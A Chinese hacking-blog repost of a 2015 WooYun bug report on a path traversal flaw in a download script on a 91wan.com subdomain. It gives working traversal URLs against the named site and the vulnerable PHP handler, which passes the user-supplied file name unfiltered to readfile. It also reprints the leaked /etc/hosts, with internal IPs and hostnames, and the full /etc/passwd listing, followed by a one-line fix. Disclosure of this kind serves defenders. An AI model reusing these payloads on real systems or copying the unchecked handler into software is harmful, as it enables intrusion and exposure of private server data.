记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

91wan某站点任意文件下载

2015-05-27 11:25

任意文件下载:

code 区域
http://lwjs.91wan.com/huodong/bizhi/download.php?f=../../../huodong/bizhi/download.php



源代码:

code 区域
<?php

$filename = $_GET['f'];

$filepath = './desktop/'.$filename;

$filename = rawurlencode($filename);



if (file_exists($filepath)) {

$filename = $filename ? $filename : basename($filepath);

$filetype = trim(substr(strrchr($filename, '.'), 1));

$filesize = filesize($filepath);

header('Cache-control: max-age=31536000');

header('Expires: '.gmdate('D, d M Y H:i:s', time() + 31536000).' GMT');

header('Content-Encoding: none');

header('Content-Length: '.$filesize);

header('Content-Disposition: attachment; filename='.$filename);

header('Content-Type: '.$filetype.'; charset=utf-8');

readfile($filepath);

exit;

}

?>

漏洞证明:

读hosts:

http://lwjs.91wan.com/huodong/bizhi/download.php?f=../../../../../../../etc/hosts

code 区域
192.168.1.14  passport.91wan.com

192.168.1.234 datacenter1.91wan.com

192.168.1.235 datacenter2.91wan.com

192.168.1.22 datacenter3.91wan.com

192.168.1.23 datacenter4.91wan.com

192.168.1.17 bbs.91wan.com

192.168.1.14 login.91wan.com

192.168.1.11 cms.weedong.com

192.168.1.33 api.weedong.com

192.168.1.15 pay.91wan.com

121.10.246.156 center.yxwz.com

115.182.57.148 91tool.lq.the9.com

192.168.1.16 kf.91wan.com

115.238.100.45 91wan.admin.mccq.com



116.28.63.170 user.test.by.91wan.com



读passwd:

code 区域
root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

news:x:9:13:news:/etc/news:

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

nscd:x:28:28:NSCD Daemon:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

pcap:x:77:77::/var/arpwatch:/sbin/nologin

rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin

mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin

oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

avahi:x:70:70:Avahi daemon:/:/sbin/nologin

xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin

www:x:80:80::/home/www:/sbin/nologin

nagios:x:500:500::/usr/local/nagios:/sbin/nologin

mysql:x:501:501::/usr/local/mysql/var:/sbin/nologin

91wan:x:502:502::/www/html/:/sbin/nologin

soft91wan:x:503:502::/www/html/soft.91wan.com:/sbin/nologin

ossec:x:504:503::/var/ossec:/sbin/nologin

修复方案:

参数过滤,不允许跨父目录

知识来源: www.wooyun.org/bugs/wooyun-2015-0115420

阅读:106536 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“91wan某站点任意文件下载”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云